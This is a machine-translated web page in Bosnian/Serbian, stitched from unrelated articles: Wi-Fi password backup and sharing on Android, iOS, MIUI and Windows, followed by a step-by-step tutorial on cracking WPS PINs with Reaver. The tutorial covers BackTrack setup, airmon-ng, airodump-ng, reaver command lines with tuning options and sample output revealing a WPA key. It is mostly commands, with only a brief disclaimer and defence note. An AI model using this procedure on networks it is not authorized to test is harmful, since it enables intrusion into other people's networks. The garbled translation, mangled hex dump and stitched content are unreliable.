Sačuvajte podatke koje prenosi wi-fi. Pogledajte sačuvane Wi-Fi lozinke na Androidu

Sa razvojem interneta, WIFI je dostupan u cijelom svijetu. Tako WIFI za mnoge ljude gotovo postaje nedjeljiv dio naših života. Koristimo ga za surfovanje internetom, gledanje video zapisa i provjeru Twittera i Facebooka i još mnogo toga. Također ga koristimo za izradu sigurnosnih kopija podataka naših ličnih Android uređaja na Internetu. Jer ako koristimo 4G/3G/2G za sigurnosnu kopiju podataka, a veličina ovih podataka je prevelika, možda ćemo morati platiti mnogo novca i gubiti previše vremena. Ponekad možete zaboraviti Wi-Fi lozinke, tako da moramo podržati android lozinke WiFi na sigurnom mjestu da vas spriječi WIFI korištenje. Ovdje predstavljamo nekoliko jednostavne načine sigurnosno kopirajte svoje WIFI lozinke i Android podatke putem WiFi mreže.

Dio 1. Dva načina za sigurnosno kopiranje Android WIFI postavki

Metoda 1. Ručna kontrola za pravljenje rezervnih kopija WIFI lozinki na Google

Ovdje ćemo vam pokazati kako napraviti sigurnosnu kopiju WIFI lozinke na usluzi koju je Google pružio. Slijedite korake koje prikazujemo i pokušajte to učiniti sami.

korak 1. Otvorite postavke svog Android uređaja. Nađi Google račun i prijavite se.

korak 2. Vidjet ćete opciju sigurnosne kopije i resetiranja, a možete napraviti sigurnosnu kopiju podataka aplikacije, postavki i WIFI lozinki na Google serverima.

Ali otkrićete da nisu svi Android uređaj mogu to učiniti. Dakle, morate se obratiti nekima android aplikacije za pomoc. Također vam nudimo nekoliko aplikacija koje će vam pomoći da to učinite.

metod 2. Dvije aplikacije za izradu sigurnosnih kopija vaših WIFI lozinki na Androidu

1. WIFI Pass Recovery & Backup

WIFI Pass Recovery & Backup prikazuje WIFI ime i lozinku i naručite ih po prvom slovu. Također može kreirati datoteku koja sadrži WIFI lozinku i pohraniti je na SD karticu. Kada trebate vratiti svoju lozinku, možete jednostavno kliknuti i oporaviti WIFI podaci. Štaviše, lozinku možete kopirati i zalijepiti u drugu datoteku. Ako trebaš Dodatne informacije, kliknite na link koji imamo ispod.

2.Backup vaš mobilni

To je potpuno besplatna aplikacija sve u jednom Android platforma. Može napraviti sigurnosnu kopiju vaših podataka uključujući kontakte, postavke, APNS, WIFI lozinku, kalendare, korisničke aplikacije, poruke, historiju pretraživača, markere, itd. Ovi sigurnosno kopirani podaci će biti pohranjeni na vašoj SD kartici ili memorijskom telefonu. Ali da napravite rezervnu kopiju wifi lozinke, morate root svoj Android uređaj.

Pronađite svoju Napravite sigurnosnu kopiju vašeg mobilnog V Google Play
https://play.google.com/store/apps/details?ID=com.backupyourmobile

Dio 2. Kako napraviti sigurnosnu kopiju svih podataka na Androidu koristeći Wi-Fi

Nakon uvoda, kako napraviti sigurnosnu kopiju Wi-Fi lozinki na android telefon ili tablet, mislimo da znate kako. I možete uživati ​​u sreći koju vam WIFI donosi besplatno. A sada ćemo vam reći kako napraviti sigurnosnu kopiju Androida preko Wi-Fi mreže.

Toplo vam preporučujemo odličnog pomagača - Mobile Go za Android. To je također aplikacija sve u jednom. Može napraviti sigurnosnu kopiju vaših podataka uključujući kontakte, muziku, poruke, fotografije, kalendare, evidencije poziva, aplikacije, video zapise i podatke aplikacija jednim klikom. Ako želite, sigurnosne kopije se mogu lako vratiti.

Slijedite naše korake i mi ćemo vam pokazati kako ga koristiti:

  • 1. Preuzmite MobileGo za Android i instalirajte na svoj računar, preuzmite APK fajl i instalirajte na svoje Android uređaje.
  • 2. Pronađite opciju WIFI u postavkama vašeg Android uređaja i uključite je. Otvorite aplikaciju MobileGo na svom telefonu.
  • 3. Za povezivanje računara morate koristiti funkciju skeniranja QR koda. Ono što treba da uradite je da kliknete na njega i skenirate QR kod koji se prikazuje na računaru.
  • 4. Nakon skeniranja QR koda, vaš Android uređaj će biti povezan sa računarom.
  • 5. Kliknite na dugme Sigurnosna kopija jednim klikom koje se prikazuje u pokrenutim prozorima računara.
  • 6. Ovo je iskačući prozor koji vam prikazuje podatke za koje možete napraviti sigurnosnu kopiju na svom Android uređaju. Označite da želite da napravite rezervnu kopiju i kliknite na opciju Backup.
  • 7. Samo pričekajte da se proces sigurnosne kopije završi. File backup biće sačuvana na računaru.

savjet: Ako je ovo prvi put da povezujete svoj Android uređaj sa računarom koristeći USB kabl, vaš Android uređaj će automatski instalirati MobileGo APK fajl.

Za povezivanje na WiFi mreže u kafiću ili kod prijatelja obično moramo tražiti lozinku i unijeti je na svoj uređaj. Sve ovo, naravno, nije baš zgodno i oduzima puno vremena. Osim toga, dešava se da ljudi jednostavno ne pamte lozinku za svoj Wi-Fi.
Srećom, s pojavom iOS-a 11, sve ove poteškoće više nisu relevantne - zahvaljujući nova funkcija Apple je nazvao "Share Your Wi-Fi" ("Share your Wi-Fi"). Sada možete da se povežete na tuđi Wi-Fi samo jednim „dodirom“ na ekran drugog uređaja koji je već povezan na mrežu.
Odlično je, zar ne? Nema više potrebe da pamtite i kucate dugo i složene lozinke. Nema potrebe da brinete da sada neko zna vašu lozinku. QR kodovi nisu potrebni. A sve što je potrebno je prisustvo uređaja koji međusobno djeluju operativni sistemi iOS 11 ili macOS High Sierra.

Šta će biti potrebno

Ova metoda radi na iPad, iPhone, iPod touch i Mac sa iOS 11 i novijim ili macOS High Sierra i novijim. Također, provjerite jesu li Wi-Fi i Bluetooth omogućeni na oba uređaja.
U našem primjeru koristit ćemo dva iPhonea.

Korak 1: Odaberite Wi-Fi mrežu

Otvorite na iPhone uređaju na koji ćete se povezati na internet, wifi postavke i odaberite mrežu na koju želite da se povežete - to jest, istu mrežu koju koristi drugi iPhone. Nakon odabira mreže, polje Enter Password će se pojaviti na ekranu.

Korak 2 Otključajte uređaj koji je već povezan na Wi-Fi

Korak 3: Približite uređaje

Ako se do sada ništa nije dogodilo, približite uređaje - u ovom slučaju nisu povezani WiFi iPhoneće moći poslati zahtjev povezanom.

Korak 4: Pošaljite svoju lozinku

Nakon kratke pauze, polje za lozinku na nepovezanom iPhone-u će se automatski popuniti i uređaj će se odmah povezati na Wi-Fi mrežu. Sada sve što treba da uradite je da kliknete na dugme "Gotovo".

To je sve! Naravno, ako nemate povjerenja u osobu koja želi dobiti vašu Wi-Fi lozinku, trebali biste odbiti njen zahtjev. Uostalom, iako neće moći vidjeti lozinku na svom uređaju, kasnije, ako je lozinka pohranjena u Keychain aplikaciji, može se vidjeti na Macu. osim toga, ovu metodu, vjerovatno nije prikladno za neke korporativne poslovnice WiFi pristup, gdje se radi autorizacije koristi RADIUS server.

Poricanje odgovornosti: Ovaj članak je napisan samo u obrazovne svrhe. Autor ili izdavač nije objavio ovaj članak u zlonamjerne svrhe. Ako čitatelji žele koristiti informacije za ličnu korist, onda autor i izdavač nisu odgovorni za bilo kakvu štetu ili štetu.

Vjerovatno se svaka moderna osoba susrela sa situacijom u kojoj se povezivanje na tuđi Wi-Fi pretvara u pravu glavobolju. Vlasnici ne samo da ne znaju lozinku napamet, već su zaboravili i gdje se krije papir na kojem je ispisana. S jedne strane, dođavola s internetom, jer je živa komunikacija uvijek bolja, s druge strane, ponekad je pristup webu zaista neophodan. Pa, u pravilu, ovaj problem je rješiv i ne zahtijeva čak ni posebne geste. Pogledajmo nekoliko opcija za različite OS i jedan jedinstven način za MIUI.

Za iOS

Ova metoda je prikladna ako i vlasnici Wi-Fi mreže i "gosti" koriste i-gadget na iOS-u 11 i novijim. U tom slučaju morate slijediti nekoliko jednostavnih koraka:

  1. uključite Bluetooth;
  2. imamo oba uređaja u neposrednoj blizini iu otključanom stanju;
  3. na uređaju „gost“ pratite put Postavke-Wi-Fi i odaberite mrežu koja nas zanima, otvorite prozor za unos lozinke;
  4. na “host” uređaju, čekamo da se pojavi iskačući prozor u kojem trebate potvrditi operaciju. Postoji jedno dugme, nemoguće ga je zbuniti.

Kao što vidite, postupak je najjednostavniji i najveća poteškoća je čekati da se pojavi iskačući prozor za stvarni prijenos lozinke. Ovo može potrajati nekoliko sekundi. Ako ste slučajno zatvorili ovaj prozor, možete ponovo pokrenuti slanje lozinke tako što ćete ponovo blokirati i otključati svoj i-gadget.

Za Android

Nažalost, u Androidu ne postoji takav univerzalni način za prijenos lozinke s Wi-Fi mreže, ali problem se može riješiti sredstvima treće strane. Na Google Play-u postoje aplikacije koje vam omogućavaju generiranje QR koda, skeniranjem kojeg se vaši gosti mogu brzo povezati na vašu mrežu. Na uređaju za goste dodatne aplikacije Istovremeno, nisu potrebni, srećom, čak i standardne kamere sada čitaju QR kodove, a ako vaš uređaj nema takvu opciju, Google Play nudi puno opcija. Jedini uslov je da svi navedeni programi za kreiranje QR zahtevaju da korisnik ima root prava. Našim čitaocima nudimo nekoliko opcija dostupnih za besplatno preuzimanje na Google Playu: WiFi QR Code Generator, Wifi QR Code Creator i QR Code Generator.

Za MIUI

A sada hajde da pričamo o tome Xiaomi korisnici. Oni vole vlasničku školjku svog proizvođača s razlogom: ima mnogo zanimljivih postavki koje nisu dostupne na "golom" androidu. Da, da, upravo je to slučaj o kojem smo govorili u članku “5 minusa i jedan plus školjki na Androidu”. Sam proces je jednostavan i ponavlja gore opisani, odnosno uređaj „gost“ skenira QR kod u koji je šifrirana lozinka. Da bi "host" uređaj generirao ovaj kod, izvodimo sljedeće korake:

  1. idite na Postavke - Wi-Fi;
  2. dodirnite naslov kućnu mrežu i vidimo iskačući prozor sa QR kodom, nudimo da ga skeniramo.
  3. ako je i čitalac Xiaomi pametni telefon, možete koristiti ugrađenu aplikaciju Scanner.

U ovom članku ću podijeliti ovu metodu s vama. Ako to doživite, molimo vas da objavite u komentarima da li je u vašoj situaciji sve prošlo glatko.

Sačuvajte postavke mreže na fleš disk

  1. U donjem desnom uglu radne površine kliknite levim tasterom miša na ikonu veze bežičnu mrežu(trougao vertikalnih pruga). U meniju koji se otvori odaberite "Centar za mrežu i dijeljenje".
  2. U prozoru koji se otvori idite na „Upravljanje bežičnom mrežom“.
  3. Otvoriće se novi prozor sa spiskom svih bežičnih mreža na koje smo se nedavno povezali (osim onih koje je sistem „zaboravio“ na naš zahtev). Ovdje nalazimo mrežu čije postavke želite da sačuvate i dvaput kliknite na nju levim tasterom miša.
  4. Otvara se prozor sa svojstvima veze. Na dnu se nalazi plavi natpis "Kopiraj ovaj mrežni profil na USB fleš disk". Kliknemo na njega.
  5. Sada će se od vas tražiti da umetnete USB memorijski uređaj. Uradimo to i kliknemo na dugme "Dalje".
  6. Biće potrebno nekoliko sekundi da se postavke WiFi mreže kopiraju na fleš disk. Ako kliknete na „Prikaži detaljna uputstva“, otvorit će se dokument koji opisuje kako koristiti sačuvani profil bežične mreže. Ne morate čitati ovaj priručnik – sve što trebate znati, reći ću vam u nastavku. Kada je kopiranje završeno, kliknite na dugme "Zatvori".

Na USB sticku će se pojaviti dvije nove datoteke: AUTORUN.INF i setupSNK.exe, kao i folder postavki: SMRTNTKY. Uvjerite se da ih imate, inače nećete moći prenijeti postavke na drugi računar.

Uvoz postavki Wi-Fi mreže u druge sisteme

Ovaj dio posla je još lakši.

  1. USB fleš disk povezujemo sa drugim računarom na kojem želimo da postavimo bežičnu mrežu.
  2. Ako funkcija automatskog pokretanja nije onemogućena na njemu, pojavit će se prozor u kojem odabiremo stavku "Poveži se na bežičnu mrežu pomoću Windows Connect Now". Ako se ovaj prozor ne pojavi, dvaput kliknite na datoteku setupSNK.exe sačuvanu na USB disku. U oba slučaja dobijamo isti rezultat.
  3. Pokrenut će se čarobnjak za bežičnu mrežnu vezu. Pritisnite dugme "Da" i nakon nekoliko sekundi vidjet ćete poruku o uspješan završetak proces povezivanja na bežičnu mrežu.

To je sve! Veoma jednostavno. U stvari, proces traje čak i manje vremena od čitanja ovog priručnika. Sada možete brzo prenijeti postavke bežične mreže na bilo koji broj računara.

Lako prenošenje postavki bežične mreže pomoću USB memorije samo je vrh ledenog brega. Mnogo je tajni povezanih s korištenjem bežičnih mreža. Ako vam opisani način prijenosa postavki iz bilo kojeg razloga ne odgovara, onda to možete učiniti pomoću QR koda ili mobilne aplikacije.

Također preporučujem organiziranje nadzora uređaja povezanih na mrežu. To vam omogućava da budete sigurni da je sigurno zaštićen.

Ostati u kontaktu!

Posjedovanje USB sticka s postavkama bežične mreže omogućit će vam da povežete nove uređaje na njega rekordnom brzinom. Sada ne morate pamtiti lozinku ili je prepisivati ​​sa komada papira. Ubacili smo USB fleš disk, pokrenuli fajl i nakon nekoliko sekundi sve radi!

Naravno, ova metoda je posebno korisna za mrežne administratore sa velikim brojem računara. Ali niko ne zabranjuje korištenje u kućnim mrežama. Stoga dodajte automatski prijenos postavki Wi-Fi mreže u svoj arsenal alata za automatska instalacija i sistemske postavke.

Koristite li drugu metodu? brzo podešavanje bežična mreža? Podijelite ga u komentarima!

Ne tako davno, činilo se da je bežična mreža zaštićena WPA2 tehnologijom prilično sigurna. Zaista je moguće pokupiti jednostavan ključ za povezivanje. Ali ako postavite zaista dugačak ključ, ni tabela duge, pa čak ni GPU ubrzanje neće pomoći da ga povežete. Ali, kako se ispostavilo, možete se povezati na bežičnu mrežu i bez toga - koristeći nedavno otkrivenu ranjivost u WPS protokolu.

UPOZORENJE

Sve informacije su date samo u obrazovne svrhe. Prodiranje u tuđu bežičnu mrežu lako se može smatrati krivičnim djelom. Misli svojom glavom.

Cijena pojednostavljenja

Sve je manje otvorenih pristupnih tačaka na koje uopće ne morate unijeti ključ da biste se povezali. Čini se da bi uskoro mogli biti uvršteni u Crvenu knjigu. Ako ranije osoba možda nije ni znala da se bežična mreža može zatvoriti ključem, štiteći se od vanjskih veza, sada mu se sve više govori o ovoj mogućnosti. Uzmite barem prilagođeni firmver koji su izdali vodeći provajderi za popularne modele rutera kako biste pojednostavili postavljanje. Morate navesti dvije stvari - prijavu / lozinku i ... ključ za zaštitu bežične mreže. Što je još važnije, sami proizvođači hardvera pokušavaju učiniti proces postavljanja jednostavnim. Dakle, većina modernih rutera podržava mehanizam WPS (Wi-Fi Protected Setup). Uz njegovu pomoć korisnik može postaviti sigurnu bežičnu mrežu za nekoliko sekundi, a da se uopće ne zamara činjenicom da „negdje drugdje treba omogućiti enkripciju i registrirati WPA ključ“. Unesite u sistem osmocifreni PIN koji je napisan na ruteru - i gotovi ste! I evo, drži se čvrsto. U decembru su dva istraživača odmah progovorila o ozbiljnim fundamentalnim nedostacima u WPS protokolu. To je kao stražnja vrata za bilo koji ruter. Ispostavilo se da ako je WPS aktiviran na pristupnoj tački (koja je za trenutak uključena u većini rutera po defaultu), onda možete podići PIN za povezivanje i izvući ključ za povezivanje za nekoliko sati!

Kako WPS funkcionira?

Ideja kreatora WPS-a je dobra. Mehanizam automatski postavlja naziv mreže i šifriranje. Dakle, korisnik ne mora ulaziti u web sučelje i baviti se složenim postavkama. I možete lako dodati bilo koji uređaj (na primjer, laptop) u već konfiguriranu mrežu: ako ispravno unesete PIN, on će dobiti sva potrebna podešavanja. Ovo je veoma zgodno, zbog čega svi glavni igrači na tržištu (Cisco / Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) sada nude bežične rutere sa WPS-om. Hajde da razumemo još malo.

Postoje tri opcije za korištenje WPS-a:

  1. Push Button Connect (PBC). Korisnik pritisne posebno dugme na ruteru (hardver) i na računaru (softver), čime se aktivira proces konfiguracije. Ne zanima nas.
  2. Unošenje PIN koda u web interfejs. Korisnik preko pretraživača ulazi u administrativni interfejs rutera i unosi osmocifreni PIN kod ispisan na kućištu uređaja (slika 1), nakon čega se odvija proces konfiguracije. Ova metoda je prikladnija za početnu konfiguraciju rutera, pa je nećemo ni razmatrati.
  3. Unošenje PIN koda na računar korisnika (slika 2). Kada se povezujete na ruter, možete otvoriti posebnu WPS sesiju, u okviru koje možete konfigurirati ruter ili dobiti postojeća podešavanja ako ispravno unesete PIN kod. Sada je to atraktivno. Za otvaranje takve sesije nije potrebna autentifikacija. Svako može ovo da uradi! Ispostavilo se da je PIN kod već potencijalno podložan napadu bruteforce. Ali ovo je samo cveće.

Ranjivost

Kao što sam ranije napomenuo, PIN se sastoji od osam cifara - stoga postoji 10^8 (100.000.000) izbora između kojih možete izabrati. Međutim, broj opcija se može značajno smanjiti. Činjenica je da je posljednja cifra PIN koda neka vrsta kontrolne sume, koja se izračunava na osnovu prvih sedam cifara. Kao rezultat, već dobijamo 10 ^ 7 (10.000.000) opcija. Ali to nije sve! Zatim pažljivo pogledamo uređaj WPS protokola za autentifikaciju (slika 3). Čini se da je posebno dizajniran da ostavi mogućnost za grubu silu. Ispostavilo se da se provjera PIN koda provodi u dvije faze. Podijeljen je na dva jednaka dijela, a svaki dio se provjerava posebno! Pogledajmo dijagram:

  1. Ako je nakon slanja M4 poruke napadač dobio EAP-NACK kao odgovor, onda može biti siguran da je prvi dio PIN koda netačan.
  2. Ako je primio EAP-NACK nakon slanja M6, onda je, shodno tome, drugi dio PIN koda netačan. Dobijamo 10^4 (10.000) opcija za prvu polovinu i 10^3 (1.000) za drugu. Kao rezultat, imamo samo 11.000 opcija za kompletno nabrajanje. Da biste bolje razumjeli kako će ovo funkcionirati, pogledajte dijagram.
  3. Važna tačka - moguća brzina traži. Ograničeno je brzinom kojom ruter obrađuje WPS zahtjeve: neke pristupne točke će dati rezultat svake sekunde, druge svakih deset sekundi. Većina vremena se troši na izračunavanje javnog ključa koristeći Diffie-Hellman algoritam, on se mora generirati prije koraka M3. Vrijeme utrošeno na ovo može se smanjiti odabirom jednostavnog tajnog ključa na strani klijenta, što dodatno pojednostavljuje izračunavanje ostalih ključeva. Praksa pokazuje da je za uspješan rezultat obično dovoljno prebrati samo polovinu svih opcija, a u prosjeku je za grubu silu potrebno samo četiri do deset sati.

Prva implementacija

Prva brute-force implementacija koja se pojavila bio je uslužni program wpscrack (goo.gl/9wABj), koji je napisao istraživač Stefan Fiböck u Pythonu. Uslužni program je koristio biblioteku Scapy, koja vam omogućava da ubacite proizvoljno mrežni paketi. Skripta se može pokrenuti samo pod Linux sistemom, nakon prevođenja bežični interfejs u režim praćenja. Kao parametre morate navesti naziv mrežnog interfejsa u sistemu, MAC adresu bežičnog adaptera, kao i MAC adresu pristupne tačke i njen naziv (SSID).

$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v njuškalo je počelo pokušavati 00000000 pokušaj 0,95 sekundi pokušavam 00010009<...>pokušaj 18660005 pokušaj je trajao 1,08 sekundi pokušaj 18670004# pronađeno 1. polovina pokušaja PIN-a je trajalo 1,09 sekundi pokušaj 18670011 pokušaj je trajao 1,08 sekundi<...>pokušavam 18674095# pronašao 2. polovinu PIN-a<...>Mrežni ključ: 0000 72 65 65 61 6c 79 5F 72 65 61 61 6C 6C 79 5F 6C 6F Stvarno_Rally_lo 0010 67 5F 77 70 61 51 72 73 73 70 68 72 61 73 NG_WPA_PASPSPHRAS 0020 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 6B 5F 63 72 61 63 E_Good_Luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

Kao što vidite, prvo je odabrana prva polovina PIN koda, zatim druga, a na kraju je program izdao ključ spreman za korištenje za povezivanje na bežičnu mrežu. Teško je zamisliti koliko bi vremena trebalo da se pogodi ključ ove dužine (61 znak) sa već postojećim alatima. Međutim, wpscrack nije jedini uslužni program za iskorištavanje ranjivosti, a ovo je prilično smiješan trenutak: u isto vrijeme, drugi istraživač, Craig Heffner iz Tactical Network Solutions, radio je na istom problemu. Vidjevši da se na webu pojavio funkcionalni PoC za implementaciju napada, objavio je svoj uslužni program Reaver. On ne samo da automatizuje WPS-PIN brute-force proces i izvlači PSK ključ, već nudi i više podešavanja tako da se napad može izvesti na širok spektar rutera. Osim toga, podržava mnogo veći broj bežičnih adaptera. Odlučili smo to uzeti kao osnovu i detaljno opisati kako napadač može koristiti ranjivost u WPS protokolu za povezivanje na sigurnu bežičnu mrežu.

KAKO

Kao i kod svakog drugog napada na bežičnu mrežu, trebat će nam Linux. Ovdje moram reći da je Reaver prisutan u spremištu poznate distribucije BackTrack, koja također već uključuje potrebne drajvere za bežični uređaji. Stoga ćemo ga koristiti.

Korak 0. Pripremite sistem

Na službenoj web stranici BackTrack 5 R1 je dostupan za preuzimanje kao virtuelna mašina pod VMware-om i za pokretanje ISO slika. Preporučujem poslednju opciju. Možete jednostavno snimiti sliku na disk, ili možete koristiti program za izradu fleš disk za pokretanje: na ovaj ili onaj način, dizanjem sa takvog medija, mi dodatne nevolje odmah ćemo imati sistem spreman za rad.

Ubrzani kurs za hakovanje Wi-Fi

  1. WEP (Wired Equivalent Privacy) Prva tehnologija za osiguranje bežične mreže pokazala se izuzetno slabom. Može se hakovati za samo nekoliko minuta, koristeći slabosti RC4 šifre koja se koristi u njemu. Glavni alati ovdje su airodump-ng sniffer za prikupljanje paketa i aircrack-ng uslužni program koji se koristi direktno za razbijanje ključa. Postoji i poseban alat wesside-ng, koji generalno hakuje sve obližnje tačke sa WEP-om u automatskom režimu.
  2. WPA/WPA2 (bežični zaštićeni pristup)

Brute force je jedini način da se pronađe ključ za zatvorenu WPA/WPA2 mrežu (pa čak i tada samo ako postoji dump tzv. WPA Handshake-a, koji se emituje kada se klijent poveže na pristupnu tačku).

Gruba sila može se povući danima, mjesecima i godinama. Da bi se povećala efikasnost nabrajanja, prvo su korišćeni specijalizovani rečnici, zatim su generisane dugine tabele, a kasnije su se pojavili uslužni programi koji su uključivali NVIDIA tehnologije CUDA i ATI Stream za hardversko ubrzanje proces kroz GPU. Alati koji se koriste su aircrack-ng (brute sile rječnika), cowpatty (koristeći rainbow tablice), pyrit (koristeći grafičku karticu).

Korak 1. Prijava

Podrazumevana prijava i lozinka su root:toor. Jednom u konzoli, možete bezbedno da pokrenete "x" (postoje odvojene BackTrack verzije - i sa GNOME-om i sa KDE-om):

#startx

Korak 2 Instalirajte Reaver

Da preuzmemo Reaver, potreban nam je internet. Stoga povezujemo patch kabel ili konfiguriramo bežični adapter(meni "Aplikacije > Internet > Wicd Network Manager"). Zatim pokrenite emulator terminala, gdje učitavamo najnoviju verziju uslužni programi preko spremišta:

# apt-get update # apt-get install reaver

Ovdje moram reći da spremište sadrži verziju 1.3, koja meni lično nije radila. Tragajući za informacijama o problemu, pronašao sam post autora koji preporučuje nadogradnju na najvišu moguću verziju kompajliranjem izvora preuzetih iz SVN-a. Ovo je, generalno, najviše univerzalni način instalacija (za bilo koju distribuciju).

$ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # napravi instalaciju

Neće biti problema sa sastavljanjem pod BackTrack-om - lično sam proverio. Na Arch Linux distribuciji koju koristim, instalacija je još lakša, zahvaljujući odgovarajućem PKGBUILD:

$ yaourt -S reaver-wps-svn

Korak 3. Priprema za grubu silu

Da biste koristili Reaver, trebate učiniti sljedeće stvari:

  • stavite bežični adapter u nadzorni mod;
  • saznajte naziv bežičnog interfejsa;
  • saznati MAC adresu pristupne tačke (BSSID);
  • provjerite je li WPS omogućen na tački.

Prvo, hajde da proverimo da li je bežični interfejs uopšte prisutan u sistemu:

# iwconfig

Ako izlaz ove komande sadrži interfejs sa opisom (obično je to wlan0), onda je sistem prepoznao adapter (ako se povezao na bežičnu mrežu da preuzme Reaver, onda je bolje da prekinete vezu). Stavimo adapter u nadzorni mod:

# airmon-ng start wlan0

Ova naredba kreira virtuelno sučelje u nadzornom modu, njegovo ime će biti naznačeno u izlazu naredbe (obično mon0). Sada moramo pronaći pristupnu tačku za napad i saznati njen BSSID. Upotrijebimo uslužni program za slušanje bežičnog emitiranja airodump-ng:

# airodump-ng mon0

Na ekranu će se pojaviti lista pristupnih tačaka na dohvat ruke. Zanimaju nas bodovi sa WPA/WPA2 enkripcijom i autentifikacijom PSK ključa.

Bolje je izabrati jednog od prvih na listi, jer je dobra veza sa tačkom poželjna za napad. Ako ima mnogo tačaka i lista ne stane na ekran, onda možete koristiti još jedan dobro poznati uslužni program - kismet, gdje je interfejs prilagođeniji u tom pogledu. Opciono, možete provjeriti na licu mjesta da li je WPS mehanizam uključen na našem mjestu. Da biste to učinili, zajedno sa Reaverom (ali samo ako ga uzmete od SVN-a) dolazi uslužni program za pranje:

# ./wash -i mon0

Parametar specificira ime sučelja koje je prebačeno u način nadzora. Također možete koristiti opciju '-f' i ubaciti uslužni program cap fajlom koji je kreirao, na primjer, isti airodump-ng. Iz nekog nepoznatog razloga, BackTrack nije uključio uslužni program za pranje u paketu Reaver. Nadamo se da će do objavljivanja članka ova greška biti ispravljena.

Korak 4. Pokrenite grubu silu

Sada možete nastaviti direktno na nabrajanje PIN-a. Da biste pokrenuli Reaver u najjednostavnijem slučaju, potrebno vam je malo. Potrebno je samo da navedete naziv interfejsa (koji smo ranije prebacili u režim nadgledanja) i BSSID pristupne tačke:

# reaver -i mon0 -b 00:21:29:74:67:50 -vv

Prekidač "-vv" uključuje prošireni izlaz programa tako da možemo biti sigurni da sve radi kako treba.

Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Čeka se beacon od 00:21:29:74:67:50 [+] Povezano sa 00:21:29:74:67:50 (ESSID: linksys) [+] Pokušavam pin 63979978

Ako program konzistentno šalje PIN-ove pristupnoj tački, onda je sve dobro počelo i ostaje glupo čekati. Proces može potrajati dugo. Najkraće vrijeme koje sam uspio grubo forsirati PIN bilo je oko pet sati. Čim bude odabran, program će to rado objaviti:

[+] Pokušavam pin 64637129 [+] Ključ puknut za 13654 sekunde [+] WPS PIN: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "linksys"

Najvrednija stvar ovdje je, naravno, WPA-PSK ključ, koji se odmah može koristiti za povezivanje. Sve je tako jednostavno da ne stane ni u glavu.

Da li je moguće braniti?

Do sada se od napada možete zaštititi na jedan način - isključite WPS u postavkama rutera. Istina, kako se ispostavilo, to nije uvijek moguće. Pošto ranjivost ne postoji na nivou implementacije, već na nivou protokola, ne isplati se čekati ranu zakrpu od proizvođača koja bi rešila sve probleme. Najviše što sada mogu učiniti je da se odupru gruboj sili koliko god je to moguće. Na primjer, ako blokirate WPS na jedan sat nakon pet neuspješnih pokušaja unosa PIN koda, pretraga će trajati oko 90 dana. Ali drugo pitanje je koliko brzo se takva zakrpa može uvesti na milione uređaja koji rade širom svijeta?

Nadogradnja Reavera

U HOWTO-u smo pokazali najlakši i najsvestraniji način korištenja uslužnog programa Reaver. Međutim, implementacija WPS-a različitih proizvođača drugačije, pa je u nekim slučajevima neophodno dodatno podešavanje. U nastavku ću dati dodatne opcije, što može poboljšati brzinu i efikasnost nabrajanja ključeva.

  1. Možete postaviti broj kanala i SSID pristupne tačke: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
  2. Opcija '-dh-small' ima povoljan učinak na brzinu brute-force, koja postavlja malu vrijednost tajnog ključa, čime se olakšavaju proračuni na strani pristupne točke: # reaver -i mon0 -b 00:01:02 :03:04:05 -vv - -dh-malo
  3. Podrazumevano vremensko ograničenje odgovora je pet sekundi. Možete ga promijeniti ako je potrebno: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
  4. Podrazumevano kašnjenje između pokušaja je jedna sekunda. Također se može konfigurirati: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
  5. Neke pristupne tačke mogu blokirati WPS za određeno vrijeme, sumnjajući da pokušavaju jebati. Reaver primjećuje ovu situaciju i pauzira iteraciju na 315 sekundi prema zadanim postavkama, trajanje ove pauze se može promijeniti: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
  6. Neke implementacije WPS protokola prekidaju vezu ako je PIN netačan, iako specifikacija zahtijeva da vrate posebnu poruku. Reaver automatski prepoznaje ovu situaciju, za ovo postoji opcija '--nack': # reaver -i mon0 -b 00:01:02:03:04:05 --nack
  7. Opcija '--eap-terminate' je za one AP-ove koji zahtijevaju da se WPS sesija završi porukom EAP FAIL: # reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
  8. Pojava grešaka u WPS sesiji može značiti da AP ograničava broj pokušaja unosa PIN koda ili je jednostavno preopterećen zahtjevima. Ove informacije će biti prikazane na ekranu. U ovom slučaju, Reaver pauzira svoju aktivnost, a vrijeme pauze se može postaviti pomoću opcije '--fail-wait': # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait =360

FAQ

Pitanje: Koji je bežični adapter potreban za hakiranje?

Odgovor: Prije eksperimentiranja, morate se uvjeriti da bežični adapter može raditi u nadzornom modu. Najbolji način- provjerite listu podržanog hardvera na lokaciji projekta Aircrack-ng. Ako se postavi pitanje koji bežični modul kupiti, onda možete početi s bilo kojim adapterom baziranim na RTL8187L čipsetu. USB ključeve je lako pronaći na mreži za 20 USD.

P: Zašto dobijam greške "timeout" i "out of order"?

Odgovor: Ovo je obično zbog niske jačine signala i loša konekcija sa pristupnom tačkom. Osim toga, pristupna tačka može privremeno blokirati korištenje WPS-a.

P: Zašto lažiranje MAC adrese ne radi za mene?

Odgovor: Možda lažirate MAC virtuelnog interfejsa mon0 i to neće raditi. Morate navesti ime stvarnog interfejsa, na primjer, wlan0.

Pitanje: Zašto loš signal Reaver radi loše, iako isto WEP krekovanje radi dobro?

